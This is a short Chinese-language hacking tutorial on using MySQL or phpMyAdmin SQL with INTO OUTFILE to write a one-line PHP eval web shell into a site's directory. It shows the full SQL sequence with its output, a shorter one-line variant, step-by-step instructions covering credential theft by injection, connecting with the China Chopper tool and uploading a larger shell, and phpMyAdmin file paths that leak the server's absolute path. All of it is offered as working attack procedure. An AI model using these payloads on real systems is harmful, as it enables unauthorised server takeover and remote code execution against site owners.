USE mysql;# MySQL 返回的查询结果为空(即零行)。 # MySQL 返回的查询结果为空(即零行)。 CREATE TABLE a( cmd1 text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 # MySQL 返回的查询结果为空(即零行)。 INSERT INTO a( cmd1 ) VALUES ( '<?php eval($_POST[cmd]);?>' );# 影响列数: 1 # 影响列数: 1 SELECT cmd1 FROM a INTO OUTFILE '/data/www/heneng/cp/mm.php';# 影响列数: 1 # 影响列数: 1 DROP TABLE IF EXISTS a;# MySQL 返回的查询结果为空(即零行)。 # MySQL 返回的查询结果为空(即零行)。
1.首先通过注入获取mysql数据库的用户名和密码
2.通过相关渠道获取mysql数据库的路径
3.使用用户名和密码登陆mysql
4.获取网站可写目录的绝对路径
5.点击进入sql编辑器,输入上述代码,将一句话木马写入网站
6.使用菜刀连接一句话,上传大马
方法二:
使用phpmyadmin中的sql语句
写文件:
select '<?php @eval($_POST[1])?>' into outfile '/data/www/heneng/cp/log.php'
最后的/cp/log.php的文件名可以任意起的,不是固定的。
利用mysql数据库爆网站绝对路径方法
使用phpmyadmin的某个文件报错
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
phpMyAdmin/libraries/select_lang.lib.php
参考:360搜索“mysql写入一句话木马文件”